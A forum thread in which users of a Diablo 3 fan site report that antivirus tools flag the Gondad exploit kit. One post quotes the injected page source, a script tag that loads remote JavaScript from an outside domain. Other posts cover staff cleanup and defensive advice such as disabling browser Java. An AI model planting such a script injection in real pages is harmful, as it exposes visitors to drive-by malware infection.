Virus through site?

[Asmodeous]

Im getting it to.

AVG paid anti virus. 10.0.1427 2441/5332

www.issseem.org/net/index.html. Exploit Gondad exploit kit (type 1935)

[Dr Elmer Jiggle]

I got it too. Second time in roughly a week (different exploits). I'm about to have to decide to find a different D3 site.

[TemplarChriz]

Same here - actually it was a javascript injecting the page www.issseem.org/net/index.html - the context in the source is like follows:

<div style="660px; ">

<p><script src=http://www.issseem.org/a.js></script>
<div class="box" style="width: 310px; float: left; margin: 6px; padding: 3px; height: 204px;">

<a href="http://diablo.incgamers.com/blog/comments/diablo3ladders-com-season-starting-soon-new-cutsom-groups-kill-score-ladders">

<img title="diablo 3 kill score ladders and groups" src="http://diablo.incgamers.com/wp-content/uploads/2011/10/kill_scores1.jpg" alt="diablo 3 kill score ladders and groups" width="310" height="166" />

</a>
<div style="background: #000000; padding: 6px; height: 28px; color: #ffffff;"><strong>Monthly Kill Score Ladders &amp; Custom Ladders now available.</strong></div>

</div>
<div class="box" style="width: 310px; float: left; margin: 6px; padding: 3px; height: 204px;">

<a href="http://diablo.incgamers.com/blog/comments/magic-find-evolution-in-diablo-iii">

<img title="magic find in diablo 3" src="http://diablo.incgamers.com/wp-content/uploads/2011/10/MAGIC_FIND.jpg" alt="magic find in diablo 3" width="310" height="166" />

</a>
<div style="background: #000000; padding: 6px; height: 28px; color: #ffffff;"><strong>From first reveal to present day, how has magic find changed and what might its future be.</strong></div>

</div>

</div>

[Jason Maher]

They were removed in about 3 minutes flat. We have been working on this all day and think we have identified the attacker, the attacker's IP, the security hole which appears to be a problem in WP which we have plugged. We are watching this very closely and site is being monitored for activity 24/7. Apologies if people are getting caught up in this but this individual is determined to screw over this community at all costs.

Any idea why they have it in for us?

[nurman]

Maybe Google is picking up on the links that spammers poop on the site?

[DoW Fanatic]

i'm not sure if I accidentally told AVG to ignore the warning or not but I had to unblock the site several times over the past week. Same exploit came up and was blocked each time I came to the site that others have reported.

[Valeli]

Is there any info as to what this particular malware does, if it had been installed on our machines? I don't /think/ anything's been installed on my pc - my virus scan comes up clean at least (the same one that warned me about the site) - but I'm curious what this stuff is meant to do, and if there's any way I can be extra safe about it.

I've gotten a ton of these warnings (but hadn't noticed this particular thread until today... I pmed the mods about it though, and they gave me the basic story of what's been going on).

Also just as an aside, I really think this thread belongs in a more highly visible place. It's pretty important imo. I appreciate the efforts that the staff and everyone have gone to, and don't want to get people worked up or anything, but I think it's really important that they know what's been going on if they happened to not have antivirus stuff on their pc for whatever (poor) reason. I'm just saying... the feedback/suggestions/support forum is probably one of the last subsections of this site I'd be likely to visit.

[Varyafirion]

Is there any info as to what this particular malware does, if it had been installed on our machines? I don't /think/ anything's been installed on my pc - my virus scan comes up clean at least (the same one that warned me about the site) - but I'm curious what this stuff is meant to do, and if there's any way I can be extra safe about it.

I've gotten a ton of these warnings (but hadn't noticed this particular thread until today... I pmed the mods about it though, and they gave me the basic story of what's been going on).

http://www.avgthreatlabs.com/webthre...d-exploit-kit/

This is what the site was serving up once in a while. In itself it's just a way to get into your computer and install pretty much anything they want. So I don't know what malware ended up on an unprotected PC.
By warnings do you mean the Google "Site blocked" warning or something from your AV? If it was the latter you should be safe (assuming it didn't just warn, but also block), if only the former something might have slipped through. A full scan coming up clean is a good sign, though, I suppose (if the AV is decent). You can also try doing it in Windows safe-mode to make sure that any malware has a low chance of using tricks to hide itself. /e: Okay you said your AV. *blind*
As a general side-note: Uninstall/disable your browser's java plugin. Gondad uses holes in java. Not to mention that there's been a lot of new holes discovered recently and that many users (or at least me) don't even really need Java in the browser.

Also just as an aside, I really think this thread belongs in a more highly visible place. It's pretty important imo. I appreciate the efforts that the staff and everyone have gone to, and don't want to get people worked up or anything, but I think it's really important that they know what's been going on if they happened to not have antivirus stuff on their pc for whatever (poor) reason. I'm just saying... the feedback/suggestions/support forum is probably one of the last subsections of this site I'd be likely to visit.

+1. Though it's a bit late. The Google warnings probably didn't help user trust either. Maybe some general (and visible) statement would be a good idea.

[Chaosmage]

FYI firefox 16.0.1 on Linux complains about this too.

I've seen this thing go rampant on various sites using vBulletin, might be an exploit.